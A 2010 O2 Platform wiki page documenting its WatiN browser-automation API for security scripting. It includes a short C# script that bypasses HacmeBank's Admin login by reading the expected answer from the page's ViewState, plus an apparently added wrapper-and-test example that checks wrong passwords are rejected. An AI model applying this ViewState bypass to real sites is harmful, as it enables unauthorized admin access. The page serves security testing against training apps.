modified on 4 August 2010 at 09:08

O2 API/WatiN

For web automation O2 uses the WatiN .NET framework (http://watin.sourceforge.net/), which was inspired by the Ruby Watir framework.

WatiN is very powerful and solves well the problem of opening complete web pages and exposing their assets via easy-to-consume objects.

WatiN has been added to O2 as one of its core APIs; here are the 3 main files from O2's SVN Script folder:

  • WatiN_IE.cs - O2 object that wraps WatiN's main IE (Internet Explorer) object and allows the transparent use of WatiN as a stand-alone IE instance or inside an O2 Module
  • WatiN_IE_ExtensionMethods.cs - A number of .NET extension methods that simplify the use and scripting of WatiN's objects (and allow for the quick creation of Web Unit Tests)
  • Open 'Test Recorder' in new process.h2 - Simple script that can be used to start WatiN's recorder

Note that this version uses the WatiN 1.x branch since, at the time it was integrated into O2, the 2.x branch was not very stable (the source code currently used was imported into O2's '3rd party Dlls' code tree and can be seen here: #trunk/SourceCode_3rdParty_Dlls/WatIN)

multiple WatiN script samples

see O2 API/WatiN/Script Samples

example of O2's WatiN use

Here is an example of how WatiN is integrated into O2's Web Unit Test scripting workflow and allows for the creation of simple scripts that perform complex tasks. In this case this is a HacmeBank vulnerability where it is possible to log in to the Admin section by using a value stored in the Admin login page's ViewState:

    var GuiControl = new Panel();
    ...
    var Browser = GuiControl.add_IE();   // embed a WatiN IE instance inside the O2 GUI panel
    Browser.silent(true);                // suppress IE dialog boxes during the script
    ....
    Browser.open(StartUrl);              // StartUrl: the HacmeBank login page
    Browser.field("txtUserName").value("jv").flash();
    Browser.field("txtPassword").value("jv789").flash();
    Browser.button("Submit").click();
    Browser.link("Admin Section").flash().click();
    // the Admin login page stores the expected answer in its own ViewState
    var response = Browser.viewState().ViewState_Values[12];
    Browser.field("_ctl3:txtResponse").value(response).flash();
    Browser.button("Login").flash().click();
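The script above reads naturally because O2's WatiN_IE_ExtensionMethods.cs layers short, chainable extension methods over WatiN. The following is an added example (not code from O2 or from the WatiN project) showing how that style of wrapper can be built on the public WatiN 1.x API (WatiN.Core.IE, Find, TextField, Button, Link, Element) and then used to write a defensive Web Unit Test for the same login flow: one that checks a wrong password is rejected rather than one that reaches the Admin section. The wrapper bodies, the placeholder StartUrl and the expected error text are assumptions; O2's real implementation may differ.

```csharp
// Added example, not O2's own WatiN_IE_ExtensionMethods.cs.
// Assumes WatiN 1.x (WatiN.Core) is referenced; method names mirror the O2 script style.
using System;
using WatiN.Core;

public static class WatiNScriptExtensions
{
    public static IE open(this IE ie, string url)
    {
        ie.GoTo(url);
        return ie;
    }

    // Locate an <input type="text"> by its name attribute (txtUserName, txtPassword, ...).
    public static TextField field(this IE ie, string name)
    {
        return ie.TextField(Find.ByName(name));
    }

    // TypeText fires the key events a real user would, so client-side handlers run.
    public static TextField value(this TextField textField, string text)
    {
        textField.TypeText(text);
        return textField;
    }

    // Buttons are located by their visible value ("Submit", "Login").
    public static Button button(this IE ie, string value)
    {
        return ie.Button(Find.ByValue(value));
    }

    public static Link link(this IE ie, string text)
    {
        return ie.Link(Find.ByText(text));
    }

    // WatiN's Element.Flash() highlights the element in the browser; returning the
    // element keeps the call chainable, as in Browser.link("...").flash().click().
    public static T flash<T>(this T element) where T : Element
    {
        element.Flash();
        return element;
    }

    public static T click<T>(this T element) where T : Element
    {
        element.Click();
        return element;
    }
}

// A Web Unit Test built from the wrappers above. It exercises the same login
// form as the O2 script but asserts the negative case: invalid credentials must
// not produce a logged-in page.
public static class LoginTests
{
    // Placeholder: point this at the login page of the application under test.
    const string StartUrl = "http://localhost/PLACEHOLDER/login.aspx";

    // Assumed text the application shows on a failed login; adjust per target.
    const string FailureText = "Invalid Login";

    public static bool WrongPasswordIsRejected()
    {
        using (var browser = new IE())
        {
            browser.open(StartUrl);
            browser.field("txtUserName").value("jv").flash();
            browser.field("txtPassword").value("not-the-real-password").flash();
            browser.button("Submit").click();

            // Pass only if the failure message is present and no Admin link appeared.
            bool rejected = browser.ContainsText(FailureText);
            bool noAdminLink = !browser.ContainsText("Admin Section");
            return rejected && noAdminLink;
        }
    }

    public static void Main()
    {
        Console.WriteLine("WrongPasswordIsRejected: " + WrongPasswordIsRejected());
    }
}
```

Because each wrapper returns the element it acted on, a test reads as a single chain per step, which is what makes scripts of this kind quick to record and review. The `using` block closes the IE instance even when an assertion throws, so repeated test runs do not leave orphaned browser windows behind.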

Some of the PoCs Scripts and APIs that use WatiN

Videos that show WatiN in action:

  • HacmeBank - exploit's execution GUI
  • WebGoat - First Example of O2's WebGoat API .avi
  • O2 Platform - XSS PoC builder.avi
  • Using WatiN to create a GMail account
  • O2 Script - API for BTOpenZone
